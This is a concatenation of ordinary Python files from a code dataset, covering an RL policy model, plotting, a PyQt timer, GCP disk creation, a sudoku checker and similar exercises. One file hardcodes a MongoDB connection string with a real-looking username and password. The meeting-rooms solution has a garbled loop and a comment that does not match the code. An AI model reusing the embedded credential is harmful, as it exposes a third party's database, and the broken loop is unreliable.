__name__ == '__main__':\n unittest.main()\n","sub_path":"Week6B/book_tests.py","file_name":"book_tests.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"68650605","text":"import logging\nimport math\nfrom pathlib import Path\nfrom typing import List, Tuple\n\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport numpy as np\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import Dense\nimport tensorflow.keras.initializers as initializers\n\n\nlogger = logging.getLogger()\n\n\nclass SimpleModel(Model):\n \"\"\"Feed Forward Neural Network that represents a stochastic policy\n for continuous action spaces. Mu and sigma are calculated using\n the same internal layers.\n \"\"\"\n\n def __init__(self, model_path: Path, layer_sizes: List[int], learning_rate: float,\n actions_size: int, hidden_activation: str = \"relu\", mu_activation: str = \"tanh\",\n sigma_activation: str = \"softplus\",\n start_mu: float = 0.0, start_sigma: float = 1.0):\n \"\"\"Creates a new FFNN model to represent a policy. 
Implements all needed\n methods from tf.keras.Model.\n\n Args:\n model_path: Where to save the model and other training info\n layer_sizes: A list with the number of neurons on each hidden layer\n learning_rate: The training step size\n actions_size: The number of possible actions\n hidden_activation: Activation function for hidden layer neurons\n mu_activation: Activation function for mu\n sigma_activation: Activation function for sigma\n start_mu: The starting Mu value\n start_sigma: The starting Sigma value\n \"\"\"\n\n super(SimpleModel, self).__init__()\n self.model_path = model_path\n self.layer_sizes = layer_sizes\n self.output_size = actions_size\n self.learning_rate = learning_rate\n self.hidden_activation = hidden_activation\n self.mu_activation = mu_activation\n self.sigma_activation = sigma_activation\n self.start_mu = start_mu\n self.start_sigma = start_sigma\n\n self.hidden_layers = []\n for i in self.layer_sizes:\n self.hidden_layers.append(Dense(i, activation=self.hidden_activation,\n name=f\"hidden_{len(self.hidden_layers)}\"))\n\n self.mu = Dense(self.output_size, activation=self.mu_activation, name=\"dense_mu\",\n kernel_initializer=initializers.Constant(self.start_mu),\n bias_initializer=initializers.Zeros())\n self.sigma = Dense(self.output_size, activation=self.sigma_activation, name=\"dense_sigma\",\n kernel_initializer=initializers.Constant(self.start_sigma),\n bias_initializer=initializers.Zeros())\n\n self.optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n\n self.train_log_dir = Path(model_path, \"train_log\")\n self.summary_writer = tf.summary.create_file_writer(str(self.train_log_dir))\n\n def get_config(self):\n \"\"\"Used by tf.keras to load a saved model.\"\"\"\n return {\"layer_sizes\": self.layer_sizes,\n \"learning_rate\": self.learning_rate,\n \"output_size\": self.output_size,\n \"hidden_activation\": self.hidden_activation,\n \"mu_activation\": self.mu_activation,\n \"sigma_activation\": self.sigma_activation}\n\n @tf.function\n def call(self, inputs: tf.Tensor):\n \"\"\"See base Class.\"\"\"\n\n logger.info(\"[Retrace] call\")\n x = inputs\n for layer in self.hidden_layers:\n x = layer(x)\n mu = self.mu(x)\n sigma = self.sigma(x)\n\n return mu, sigma\n\n @tf.function\n def train_step(self, states: tf.Tensor, actions: tf.Tensor,\n weights: tf.Tensor) -> (Tuple[tf.Tensor], tf.Tensor, tf.Tensor):\n \"\"\"See base Class.\"\"\"\n\n logger.info(\"[Retrace] train_step\")\n with tf.GradientTape() as tape:\n mu, sigma = self(states)\n log_probabilities = self._get_log_probabilities(mu, sigma, actions)\n loss = -tf.reduce_mean(weights * log_probabilities)\n\n gradients = tape.gradient(loss, self.trainable_variables)\n self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))\n\n return (mu, sigma), loss, log_probabilities, gradients\n\n @tf.function\n def _get_log_probabilities(self, mu: tf.Tensor, sigma: tf.Tensor, actions: tf.Tensor) -> tf.Tensor:\n \"\"\"Gets the logarithmic probabilities of each action for each set of logits.\n\n Args:\n mu: The mean value for each action for each step\n sigma: The variance value for each action for each step\n actions: The actual actions used in each step\n\n Returns:\n The logarithmic probabilities for the actions\n \"\"\"\n\n logger.info(\"[Retrace] get_log_probabilities\")\n\n x1 = actions - mu\n x2 = x1 ** 2\n sigma2 = sigma ** 2\n x3 = x2 / sigma2\n logsigma = tf.math.log(sigma)\n x4 = x3 + (2 * logsigma)\n actions_sum = tf.reduce_sum(x4, axis=-1)\n x5 = actions_sum + self.output_size * 
tf.math.log(2 * math.pi)\n x6 = - x5 * 0.5\n log_probabilities = x6\n return log_probabilities\n\n @tf.function\n def produce_actions(self, states: tf.Tensor) -> tf.Tensor:\n \"\"\"Get a sample from the action probability distribution produced\n by the model, for each passed state.\n\n Args:\n states: The list of states representations\n\n Returns:\n The sampled action for each state\n \"\"\"\n\n logger.info(\"[Retrace] produce_actions\")\n mu, sigma = self(states)\n actions = tfp.distributions.Normal(mu, sigma).sample([1])\n return actions\n\n\ndef test():\n tf.config.run_functions_eagerly(True)\n tf.random.set_seed(0)\n model = SimpleModel(model_path=Path(\"experiments/tests\"),\n layer_sizes=[],\n learning_rate=0.1,\n actions_size=1,\n hidden_activation=\"tanh\",\n mu_activation=\"tanh\",\n sigma_activation=\"softplus\")\n\n state = np.array([[1.], [1.], [1.]])\n reward = np.array([0.5, 1., 0.2])\n\n actions = model.produce_actions(state)\n print(f\"actions train= {actions}\")\n\n (mu, sigma), loss, log_probabilities, gradients = model.train_step(state, actions, reward)\n print(f\"Mu = {mu}\")\n print(f\"Sigma = {sigma}\")\n print(f\"loss = {loss}\")\n print(f\"log_probabilities train= {log_probabilities}\")\n print(f\"gradients train= {gradients}\")\n pass\n\n\nif __name__ == '__main__':\n\n test()\n","sub_path":"models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"301414878","text":"import numpy as np \nfrom os import listdir\nfrom os.path import isfile, join\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport torch\nimport seaborn as sns\n\nmypath = '../weights_sin2Reg/cifar10/'\nonlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\nlayers = []\nfor each in sorted(onlyfiles):\n layers.append(np.load(mypath+each).ravel())\n\n#layers.append(np.load(mypath+'/svhn_q/svhn_features0_quantized_wrpn.npy').ravel())\n#layers.append(np.load(mypath+'/svhn_q/svhn_classifier0_quantized_wrpn.npy').ravel())\n#layers.append(mypath+'/cifar10_conv2_quantized_wrpn.npy')\nprint(onlyfiles)\n\n# plot\nf, axes = plt.subplots(1, 6, figsize=(25, 5), sharex=False)\ncolor = \"b\"\n#sns.set()\n#sns.set(style=\"white\", palette=\"bright\", color_codes=True)\nsns.set(palette=\"bright\", color_codes=True)\n\n#plt.ylabel('counts')\n#sns.distplot( layers[0] , ax=axes[0], color=color, bins=100, kde=False, axlabel='epoch#')\nleft = -0.35\nright = 0.35\nplt.subplot(1, 6, 1)\n_ = plt.hist(layers[0], 50)\n#plt.xlim((left,right))\nplt.subplot(1, 6, 2)\n_ = plt.hist(layers[1], 50)\n#plt.xlim((left,right))\nplt.subplot(1, 6, 3)\n_ = plt.hist(layers[2], 50)\n#plt.xlim((left,right))\nplt.subplot(1, 6, 4)\n_ = plt.hist(layers[3], 50)\n#plt.xlim((left,right))\nplt.subplot(1, 6, 5)\n_ = plt.hist(layers[4], 50)\n#plt.xlim((left,right))\n#plt.xlim((left,right))\n#plt.xlim((-0.5, 0.5))\n#plt.savefig('examples/classifier_compression/figs/fig_sin2_bits-44444_cf_'+str(cf)+'_lr_'+str(lr)+'_TMP.png')\nplt.savefig('cifar10_sinreq-learn.png')\n","sub_path":"examples/classifier_compression/plotting/hist_plot_weights_3.py","file_name":"hist_plot_weights_3.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"544981789","text":"import sys\n\nfrom PyQt6.QtCore import QTimer, QDateTime\nfrom PyQt6.QtWidgets import QWidget, QListWidget, QLabel, QPushButton, QGridLayout, 
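# --- Illustrative sketch (added; not part of the original dataset records) ---
# _get_log_probabilities above expands the diagonal-Gaussian log-density
# log N(a|mu,sigma) = -0.5*(sum((a-mu)^2/sigma^2 + 2*log(sigma)) + k*log(2*pi));
# a quick check of that closed form against scipy's reference implementation.
import math
import numpy as np
from scipy.stats import norm

mu, sigma = np.array([0.1, -0.2]), np.array([0.5, 1.5])
a = np.array([0.3, 0.4])
k = len(a)
hand = -0.5 * (np.sum((a - mu) ** 2 / sigma ** 2 + 2 * np.log(sigma)) + k * math.log(2 * math.pi))
print(np.isclose(hand, norm.logpdf(a, loc=mu, scale=sigma).sum()))  # True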
QApplication\n\n\nclass WinForm(QWidget):\n    def __init__(self, parent=None):\n        super(WinForm, self).__init__(parent)\n        self.setWindowTitle(\"QTimer demo\")\n        self.listFile = QListWidget()\n        self.label = QLabel(\"Show the current time\")\n        self.startButton = QPushButton(\"Start\")\n        self.endButton = QPushButton(\"Stop\")\n        layout = QGridLayout(self)\n\n        # Initialize the timer\n        self.timer = QTimer(self)\n        # Display the time\n        self.timer.timeout.connect(self.showTime)  # connect the timeout signal to a slot; when the timer expires, the timeout signal is emitted\n\n        layout.addWidget(self.label, 0, 0, 1, 2)\n        layout.addWidget(self.startButton, 1, 0)\n        layout.addWidget(self.endButton, 1, 1)\n\n        self.startButton.clicked.connect(self.start_timer)\n        self.endButton.clicked.connect(self.end_timer)\n\n        self.setLayout(layout)\n\n    def showTime(self):\n        # Get the current system time\n        time = QDateTime.currentDateTime()\n        # Set the time format\n        timeDisplay = time.toString(\"yyyy-MM-dd hh:mm:ss dddd\")\n        self.label.setText(timeDisplay)\n\n    def start_timer(self):\n        # Set the interval and start the timer\n        self.timer.start(1000)  # start() sets the interval and starts the timer, or restarts it if it is already running\n        self.startButton.setEnabled(False)\n        self.endButton.setEnabled(True)\n\n    def end_timer(self):\n        self.timer.stop()  # stop the timer\n        self.startButton.setEnabled(True)\n        self.endButton.setEnabled(False)\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    form = WinForm()\n    form.show()\n    sys.exit(app.exec())\n","sub_path":"src/pyside_demo/qtimer_demo.py","file_name":"qtimer_demo.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"598949673","text":"#!/usr/bin/python3.6.9\nfrom pymongo import MongoClient\nimport sys\n\nglobal dOut\n\n\ndef connectDB(myDB):\n    try:\n        connection = MongoClient(myDB)\n        return connection\n    except:\n        sendResult(\"Connect Error\")\n\n\ndef closeConnect(connection):\n    try:\n        connection.close()\n    except:\n        sendResult(\"Close Error\")\n\n\ndef cashflow(bId, mId, myDB):\n    try:\n        bConnect = connectDB(myDB)\n\n        baccs = bConnect.cisbank.baccs\n        moves = bConnect.cisbank.moves\n\n        bQuery = {'bAlias': bId}\n        mQuery = {'mCode': mId}\n        bacc = baccs.find_one(bQuery)\n        move = moves.find_one(mQuery)\n        if move['mSign']:\n            newBalance = bacc['bBalance'] + move['mAmmount']\n        else:\n            newBalance = bacc['bBalance'] - move['mAmmount']\n\n        oldB = bacc['bBalance']\n\n        newMoves = []\n\n        newMoves.extend(bacc['bMoves'])\n        newMoves.append(mId)\n\n        mOld = {\"$set\": {\"mOld\": bacc['bBalance']}}\n        mNew = {\"$set\": {\"mNew\": newBalance}}\n\n        bBalance = {\"$set\": {\"bBalance\": newBalance}}\n        bMoves = {\"$set\": {\"bMoves\": newMoves}}\n\n        baccs.update_one(bQuery, bBalance)\n        baccs.update_one(bQuery, bMoves)\n\n        moves.update_one(mQuery, mOld)\n        moves.update_one(mQuery, mNew)\n\n        closeConnect(bConnect)\n        status = True\n        return status\n\n    except Exception as ex:\n        template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n        message = template.format(type(ex).__name__, ex.args)\n        sendResult(message)\n        status = False\n        return status\n\n\ndef totalizeMonths(tId, mId, myDB):\n    try:\n        tConnect = connectDB(myDB)\n\n        moves = tConnect.cisbank.moves\n        mtaccs = tConnect.cisbank.mtaccs\n\n        mQuery = {'mCode': mId}\n        move = moves.find_one(mQuery)\n\n        mtQuery = {'tName': tId}\n        mtacc = mtaccs.find_one(mtQuery)\n\n        newBalance = mtacc['tBalance'] + move['mAmmount']\n        mtBalance = {\"$set\": {\"tBalance\": newBalance}}\n\n        mtaccs.update_one(mtQuery, mtBalance)\n        closeConnect(tConnect)\n        status = True\n        return status\n\n    except Exception as ex:\n        template = \"An exception of type {0} occurred. 
Arguments:\\n{1!r}\"\n        message = template.format(type(ex).__name__, ex.args)\n        sendResult(message)\n        status = False\n        return status\n\n\ndef sendResult(dOut):\n    print(dOut)\n    sys.stdout.flush()\n\n\ndef main():\n    #myDB = \"mongodb://localhost:27017/cisbank\"\n    myDB = \"mongodb://angeloacr:cisbankDataBase47@ds051595.mlab.com:51595/cisbank\"\n\n    bId = sys.argv[1]\n    tId = sys.argv[2]\n    mId = sys.argv[3]\n    #mDate = sys.argv[4]\n    statusB = cashflow(bId, mId, myDB)\n    #statusM = totalizeMove(mDate, mId, myDB)\n    statusA = totalizeMonths(tId, mId, myDB)\n    if statusB and statusA:\n        sendResult(\"Success\")\n    else:\n        sendResult(\"Error\")\n\n\n# if __name__ == \"__main__\":\n    # sendResult(\"Init\")\nmain()\n","sub_path":"cisbankServer/python/balancestatus.py","file_name":"balancestatus.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42091632","text":"import argparse\nimport os\nimport time\n\nimport googleapiclient.discovery\nfrom oauth2client.client import GoogleCredentials\n\n# [START list_disks]\ndef list_disks(compute, PROJECT, d_zone):\n    result = compute.disks().list(project=PROJECT, zone=d_zone).execute()\n    return result['items'] if 'items' in result else None\n# [END list_disks]\n\n# [START disk_attach]\ndef disk_attach(compute, PROJECT, d_zone, vm_name, d_name):\n    config = {\n        'source': \"/compute/v1/projects/\"+str(PROJECT)+\"/zones/\"+str(d_zone)+\"/disks/\"+str(d_name)\n    }\n    return compute.instances().attachDisk(\n        project=PROJECT,\n        zone=d_zone,\n        instance=vm_name,\n        body=config\n    ).execute()\n# [END disk_attach]\n\n# [START disks_creation]\ndef disks_creation(compute, PROJECT, d_zone, d_name, d_type, d_size):\n    config = {\n        'name' : d_name,\n        'type' : d_type,\n        'sizeGb' : d_size,\n    }\n    return compute.disks().insert(project=PROJECT, zone=d_zone, body=config).execute()\n# [END disks_creation]\n\n# [START wait_for_operation]\ndef wait_for_operation(compute, PROJECT, d_zone, operation):\n    print('Waiting for operation to finish...')\n    while True:\n        result = compute.zoneOperations().get(\n            project=PROJECT,\n            zone=d_zone,\n            operation=operation).execute()\n\n        if result['status'] == 'DONE':\n            print(\"done.\")\n            if 'error' in result:\n                raise Exception(result['error'])\n            return result\n\n        time.sleep(1)\n# [END wait_for_operation]\n\nPROJECT = os.environ['GCLOUD_PROJECT']\nBUCKET = os.environ['CLOUD_STORAGE_BUCKET']\n\n# [START run] \ndef main():\n    #reading the options from cfg file\n    file = open(\"test.cfg\",\"r\")\n    options=list(file.readlines())\n    for obj in options:\n        if 'VM' in obj:\n            if 'name' in obj:\n                a, vm_name=str.split(obj.strip(),'=')\n        if 'Disk' in obj:\n            if 'name' in obj:\n                a, d_name=str.split(obj.strip(),'=')\n            if 'type' in obj:\n                a, d_type=str.split(obj.strip(),'=')\n            if 'size' in obj:\n                a, d_size=str.split(obj.strip(),'=')\n            if 'zone' in obj:\n                a, d_zone=str.split(obj.strip(),'=')\n\n    compute = googleapiclient.discovery.build('compute','v1')\n\n    print('Creating disk.')\n\n    operation = disks_creation(compute, PROJECT, d_zone, d_name, d_type, d_size)\n    wait_for_operation(compute, PROJECT, d_zone, operation['name'])\n\n    disks = list_disks(compute, PROJECT, d_zone)\n\n    operation = disk_attach(compute, PROJECT, d_zone, vm_name, d_name)\n    wait_for_operation(compute, PROJECT, d_zone, operation['name'])\n    print('Disks in PROJECT %s and d_zone %s:' % (PROJECT, d_zone))\n    for disk in disks:\n        print(' - ' + disk['name'])\n\nif __name__ == '__main__':\n    parser = 
argparse.ArgumentParser(description=__doc__,formatter_class=argparse.RawDescriptionHelpFormatter)\n    parser.add_argument('PROJECT_id', help='Your Google Cloud PROJECT ID.')\n    parser.add_argument('bucket_name', help='Your Google Cloud Storage bucket name.')\n    parser.add_argument('--d_zone', default='us-central1-f', help='Compute Engine d_zone to deploy to.')\n    parser.add_argument('--size' , default='10GB', help='Size of the disk')\n    parser.add_argument('--type' , default='pd-standard', help='Type of the disk')\n    parser.add_argument('--name', default='demo-instance', help='New instance name.')\n    args = parser.parse_args()\n    main()\n# [END run]\n","sub_path":"automation_api/create_disks.py","file_name":"create_disks.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"635307619","text":"from exceptions import Empty\n\nclass ArrayQueue:\n\t\n\tdef __init__(self):\n\t\tself._data = [] \n\t\tself._size = 0\n\t\tself._front = 0\n\t\t\n\tdef __len__(self):\n\t\treturn self._size\n\t\n\tdef is_empty(self):\n\t\treturn self._size ==0\n\t\n\tdef enqueue(self, e):\n\t\tself._data.append(e)\n\t\tself._size = self._size+1\n\t\n\tdef dequeue(self):\n\t\tif self.is_empty():\n\t\t\traise Empty('Queue is Empty')\n\t\tvalue = self._data[self._front]\n\t\tself._data[self._front] = None\n\t\tself._front = self._front+1\n\t\tself._size = self._size-1\n\t\treturn value\n\t\n\tdef first(self):\n\t\tif self.is_empty():\n\t\t\traise Empty('Queue is empty')\n\t\treturn self._data[self._front]\n\t\t\nq = ArrayQueue()\nq.enqueue(10)\nq.enqueue(20)\nq.enqueue(30)\nq.enqueue(50)\nprint('Queue is :' , q._data)\n\t\t\n\t\t","sub_path":"arrayqueue.py","file_name":"arrayqueue.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121275538","text":"\ndef read_matrix():\n\tsudoku_length = 9\n\tmatrix = [[int(x) for x in input().split()] for y in range(sudoku_length)]\n\treturn matrix\n\n\ndef validate_sudoku(matrix):\n\t# Validate the rows\n\tfor i in range(9):\n\t\toccur = [False for i in range(10)]\n\t\tfor j in range(9):\n\t\t\tif occur[matrix[i][j]]:\n\t\t\t\treturn False\n\t\t\toccur[matrix[i][j]] = True\n\t\t\t\n\t# Validate the columns\n\tfor j in range(9):\n\t\toccur = [False for i in range(10)]\n\t\tfor i in range(9):\n\t\t\tif occur[matrix[i][j]]:\n\t\t\t\treturn False\n\t\t\toccur[matrix[i][j]] = True\n\t\n\t# Validate the 3x3 subgrids\n\tfor i in range(3):\n\t\tfor j in range(3):\n\t\t\toccur = [False for i in range(10)]\n\t\t\tfor k in range(3):\n\t\t\t\tfor l in range(3):\n\t\t\t\t\tif occur[matrix[i * 3 + k][j * 3 + l]]:\n\t\t\t\t\t\treturn False\n\t\t\t\t\toccur[matrix[i * 3 + k][j * 3 + l]] = True\n\n\treturn True\n\n\ndef run():\n\tprint(\"Enter the sudoku: \")\n\n\tgrid = read_matrix()\n\n\tis_valid = validate_sudoku(grid)\n\n\tif(is_valid):\n\t\tprint(\"The entered sudoku is valid\")\n\telse:\n\t\tprint(\"The entered sudoku is invalid\")\n\n\nif __name__ == \"__main__\":\n\trun()\n\n\n# 7 4 3 9 5 1 6 8 2\n# 1 6 2 4 8 7 3 9 5\n# 9 5 8 6 3 2 7 1 4\n# 2 1 9 8 7 3 5 4 6\n# 3 7 4 5 6 9 1 2 8\n# 5 8 6 1 2 4 9 7 3\n# 4 9 5 2 1 6 8 3 7\n# 8 2 7 3 9 5 4 6 1\n# 6 3 1 7 4 8 2 5 9","sub_path":"semana_01/codigos/ejercicio_03.py","file_name":"ejercicio_03.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
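# Editor's note: the record above validates a solved sudoku with boolean occurrence
# arrays. As an illustrative, hedged alternative (not part of the dataset record,
# and `matrix` is assumed to be the 9x9 list of ints that read_matrix() returns),
# the same row/column/subgrid check can be written with sets in a single pass:
def is_valid_sudoku(matrix):
    rows = [set() for _ in range(9)]
    cols = [set() for _ in range(9)]
    boxes = [set() for _ in range(9)]
    for i in range(9):
        for j in range(9):
            v = matrix[i][j]
            b = (i // 3) * 3 + (j // 3)  # index of the 3x3 box containing (i, j)
            # a repeated digit in any row, column, or box invalidates the grid
            if v in rows[i] or v in cols[j] or v in boxes[b]:
                return False
            rows[i].add(v)
            cols[j].add(v)
            boxes[b].add(v)
    return True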
+{"seq_id":"451856459","text":"#Problem 2: https://leetcode.com/problems/meeting-rooms-ii/\n#Time Complexity: O(n.logn)\n#Space Complexity: O(n)\n#Approach- low-0th element , high=last element, find mid ,perform Binary Search by computing number of elements less than mid, moving low and high\n#pointers accordingly.\nclass Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n #edge case\n if not intervals:\n return 0\n #put start and end timings in different array\n start_timing=[]\n end_timing=[]\n for i in range(len(intervals)):\n start_timing.append(intervals[i][0])\n for i in range(len(intervals)):\n end_timing.append(intervals[i][1])\n \n #sort them\n start_timing.sort()\n print(start_timing)\n end_timing.sort()\n print(end_timing)\n \n start_ptr=0\n end_ptr=0\n rooms=0\n \n while start_ptr=end_timing[end_ptr]:\n rooms-=1\n end_ptr+=1\n rooms+=1\n start_ptr+=1\n return rooms\n ","sub_path":"Problem2_Meeting Rooms.py","file_name":"Problem2_Meeting Rooms.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"279159961","text":"import sys\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom scipy.constants import codata\nfrom scipy import integrate\nmpl.rcParams['text.usetex'] = True\nmpl.rcParams['text.latex.preview'] = True\nif len(sys.argv) < 2:\n print(\"Please inform the filename.\")\n exit(1)\nfname = sys.argv[1]\ntry:\n data = np.loadtxt(fname, dtype='float')\nexcept IOError:\n print(\"File '%s' does not exit.\",fname)\n exit(1)\n# scientific constants\nc = codata.value('speed of light in vacuum') * 100 # cgs\nh = codata.value('Planck constant') * 1e7 # cgs\nk = codata.value('Boltzmann constant') * 1e7 # cgs\nMsun = 1.9885e33 # solar mass cgs\nl_sun = 3.828e+33\nk230 = 0.005\na = float(2)\nlambda_0 = float(200e-4) # cgs\nN = np.ones(3)\n# fitting curve\ndef fbb(freq, Td, b):\n wavelength = c / freq\n exp1 = 1 - np.exp(- ((lambda_0/wavelength)**b))\n exp2 = np.exp(h*freq/k/Td) - 1\n return 2 * h * exp1 * freq**3 / exp2 / c**2\ndef f(freq, Td, b):\n wavelength = c / freq\n lambda_c = 1 / ((26.6764 + 6.24629*a)**-2 + (1.90530e-04 + 7.24277e-05*a)*Td) * 1e-4\n freq_c = c / lambda_c\n power = ((wavelength/lambda_c)**a) * np.exp(- (wavelength/(lambda_c*3/4))**2)\n return fbb(freq,Td, b) + fbb(freq_c, Td, b)*power\ndef mass(freq, flux, Td, b, mpc):\n logk = np.log(k230) + b*np.log(freq/230e9)\n logM = -np.log(1e23) + np.log(flux) + 2*np.log(mpc) - logk - np.log(2*h*(freq**3)/(c**2)) - np.log(np.exp(h*freq/k/Td)-1) - np.log(Msun) - np.log(1+z)\n return logM / np.log(10)\n# data\nz = data[:,1] # redshift\nd = data[:,2]*3.086e+24 # luminosity distance: Mpc \ny = data[:,3]*1e-6 # Jy\ny_err = data[:,4]*1e-6\nt = np.array([29.68, 43.37, 34.42, 34.98, 34.69, 39.97, 42.67, 35.63, 33.06])\nt_err = np.array([1.55, 1.21, 0.64, 0.49, 0.88, 0.69, 3.03, 0.63, 0.22])\nb_est = np.array([1.27, 1.39, 1.33, 1.64, 1.33, 1.32, 1.32, 1.44, 1.79])\nb_err = np.array([0.13, 0.04, 0.04, 0.03, 0.05, 0.03, 0.11, 0.04, 0.02])\nup = c / 8.0e-4\nlow = c / 1000.0e-4\n# calculation\nT0 = np.average(t, weights=(1/t_err))\nT0_err = np.sum(t_err)/np.sqrt(len(t_err))\nb0 = np.average(b_est, weights=(1/b_err))\n#b_err = np.sum(b_err)/np.sqrt(len(b_err))\nx = 343.5e9 * (1+z)\nN = y / f(x, T0, b0)\nIR = N * integrate.quad(f, low, up, args=(T0, b0))[0] * 4 * np.pi * d**2 * 1e-23 / (l_sun)\nIR_up = N * integrate.quad(f, low, up, args=(T0+T0_err, b0))[0] * 4 * np.pi * d**2 * 1e-23 / 
(l_sun)\nIR_do = N * integrate.quad(f, low, up, args=(T0-T0_err, b0))[0] * 4 * np.pi * d**2 * 1e-23 / (l_sun)\nsfr = IR * 1.7e-10\nsfr_up = IR_up * 1.7e-10\nsfr_do = IR_do * 1.7e-10\nM = mass(x, y, T0, b0, d)\nprint(b0)\nprint(T0, T0_err)\nprint(IR)\nprint(IR_up-IR)\nprint(IR-IR_do)\nprint(sfr)\nprint(sfr_up-sfr)\nprint(sfr-sfr_do)\nprint(M)\nyerr0 = y_err[0]\npt = np.arange(4., 1200., 1) * 1e-4\nplt.plot(c/x[0]*1e4, y[0], 'bo', label='data')\nplt.errorbar(c/x[0]*1e4, y[0], yerr=yerr0, fmt='bo')\nplt.plot(pt*1e4, N[0]*f(c/pt, T0, b0), 'r-', label='Casey')\nplt.fill_between(pt*1e4, N[0]*f(c/pt, T0-T0_err, b0), N[0]*f(c/pt, T0+T0_err, b0), color='grey', alpha=0.2)\nplt.ylabel(r'$Flux\\,(Jy)$', fontsize='large')\nplt.xlabel(r'$Wavelength\\,(\\mu m)$', fontsize='large')\nplt.yscale('log')\nplt.xscale('log')\nplt.title('IR SED of GRB 080607')\nplt.legend(loc='upper right', fontsize='medium', handletextpad=0.1)\nplt.grid(True)\nplt.show()","sub_path":"final/grb.py","file_name":"grb.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"446150833","text":"from kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.relativelayout import RelativeLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.textinput import TextInput\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\n\nBuilder.load_string(\"\"\"\n<Menu>:\n    RelativeLayout:\n        size: 600,600\n        Label:\n            text: \"Title\"\n            color: [0,1,0,1]\n            font_size: 150\n        Label:\n            text: \"Random\"\n            pos: -400,0\n        Button:\n            text: \"Button\"\n            size: 1,1\n            pos: 0,200\n\n\n\n\"\"\")\n\n\nclass Menu(Screen):\n    pass\n\nsm = ScreenManager()\nsm.add_widget(Menu(name='menu'))\n\n\nclass UserInterface(App):\n\n    def build(self):\n        return sm\n\n\n\nif __name__ == '__main__':\n    UserInterface().run()","sub_path":"currentinterface.py","file_name":"currentinterface.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"552289387","text":"import os\nfrom setuptools import find_packages, setup\n\n\ndef get_package_data():\n    ''' Find all additional package data to distribute with code. '''\n\n    baseline_images = ['tests/baseline_images/%s/*' % x\n                       for x in os.listdir('ggplot/tests/baseline_images')]\n\n    return {'ggplot': baseline_images + [\"exampledata/*.csv\", \"geoms/*.png\"]}\n\n\ndef get_readme():\n    ''' Retrieve README.rst's content in a safe way. 
'''\n with open('README.rst') as f:\n return f.read()\n\n\nsetup(name=\"ggplot\",\n version=\"0.3.0\",\n author=\"Greg Lamp\",\n author_email=\"greg@yhathq.com\",\n url=\"https://github.com/yhat/ggplot/\",\n license=\"BSD\",\n packages=find_packages(),\n package_dir={\"ggplot\": \"ggplot\"},\n package_data=get_package_data(),\n description=\"ggplot for python\",\n long_description=get_readme(),\n install_requires=[\"pandas\", \"matplotlib\", \"scipy\", \"statsmodels\",\n \"patsy\"],\n classifiers=['Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python',\n 'Topic :: Software Development',\n 'Topic :: Scientific/Engineering',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'Operating System :: Unix',\n 'Operating System :: MacOS',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3'],\n zip_safe=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217253092","text":"\"\"\"\nWord Count Engine\nImplement a document scanning function wordCountEngine, which receives a string document and returns a list of all unique words in it and their number of occurrences, sorted by the number of occurrences in a descending order. If two or more words have the same count, they should be sorted according to their order in the original sentence. Assume that all letters are in english alphabet. You function should be case-insensitive, so for instance, the words “Perfect” and “perfect” should be considered the same word.\n\nThe engine should strip out punctuation (even in the middle of a word) and use whitespaces to separate words.\n\nAnalyze the time and space complexities of your solution. Try to optimize for time while keeping a polynomial space complexity.\n\nExamples:\ninput: document = \"Practice makes perfect. you'll only\n get Perfect by practice. just practice!\"\n\noutput: [ [\"practice\", \"3\"], [\"perfect\", \"2\"],\n [\"makes\", \"1\"], [\"youll\", \"1\"], [\"only\", \"1\"], \n [\"get\", \"1\"], [\"by\", \"1\"], [\"just\", \"1\"] ]\nImportant: please convert the occurrence integers in the output list to strings (e.g. \"3\" instead of 3). We ask this because in compiled languages such as C#, Java, C++, C etc., it’s not straightforward to create mixed-type arrays (as it is, for instance, in 